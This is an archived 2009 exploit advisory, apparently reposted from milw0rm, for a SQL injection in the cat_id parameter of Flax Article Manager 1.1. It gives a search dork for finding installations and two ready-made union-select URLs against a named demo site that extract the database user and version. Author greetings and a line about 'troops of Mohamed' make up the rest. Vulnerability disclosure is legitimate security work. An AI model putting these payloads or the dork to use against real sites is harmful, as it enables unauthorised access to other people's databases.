Flax Article Manager 1.1 - 'cat_id' SQL Injection

🗓️ 25 Jan 2009 00:00:00Reported by JIKOType

SQL Injection in Flax Article Manager 1.1, with author jiko and demo link

-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

# Author  : jiko

# email  : [email protected]

# Home   : www.no-exploit.Com

# Script  : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD
              $99*10 Dh(maroc)=990Dh=19800 Real maghribi
# Dork: Copyright 2006 Â© Flax Article Manager v1.1

=========================[JAWAD Cha7ta 4 ever]===================

# Exploit  :

               http://no-exploit.com

            Demo:    

 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
 

Top: ( R07 T9awwad ) To str0ke & Milw0rM

 Cyber-Zone CHof Lfo9

=========================[Thanks To Allah ]===================
 Ma3aki ya GaZa Ø±ØÙ… Ø§Ù„Ù„Ù‡ Ø´Ù‡Ø¯Ø§Ø¦Ùƒ


 greetz : all my friend and all No-exploit members and

 $ cyber-zone $ leopard $ Hassin X

 all muslims

 cyber-zone Wald Bladi B7al Khoya
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

------==        troops of Mohamed comming inchalah      =-----------------

Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2009-01-25]

25 Jan 2009 00:00Current

7.4High risk

Vulners AI Score7.4

Flax Article Manager 1.1 - &#039;cat_id&#039; SQL Injection

Flax Article Manager 1.1 - 'cat_id' SQL Injection